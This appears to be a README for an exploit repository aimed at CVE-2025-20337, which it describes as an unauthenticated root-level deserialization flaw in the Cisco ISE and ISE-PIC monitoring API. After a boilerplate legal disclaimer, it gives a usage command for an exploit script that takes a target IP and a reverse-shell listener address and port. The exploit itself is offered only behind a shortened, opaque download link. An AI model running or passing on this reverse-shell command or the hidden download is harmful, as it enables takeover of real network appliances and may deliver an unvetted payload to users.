# CVE-2025-20337
## DISCLAIMER
> This tool is provided for **educational and authorized security testing purposes only**. The author is not responsible for any misuse of this tool. Unauthorized testing of systems without explicit permission is illegal and strictly prohibited. By using this tool, you agree to use it only on systems for which you have obtained prior written permission. Any actions and/or activities related to the material contained within this repository are solely your responsibility.
## Description:
An attacker can compromise any unpatched Cisco ISE or ISE-PIC device by sending a malicious API request over the network.
No authentication or user interaction is required. By exploiting a deserialization flaw in the monitoring API, the attacker gains root access to the underlying operating system. This vulnerability turns network security appliances into attack launchpads, enabling total infrastructure takeover.
### Usage
```bash
./exploit.sh -t 10.0.55.10 -l 192.168.1.100 -p 4444
# Options:
# -t Target IP address
# -l Listener IP for reverse shell
# -p Listener port
# -c Custom command (optional)
```
Exploit:
[**href**](https://tinyurl.com/2cj5v6ze)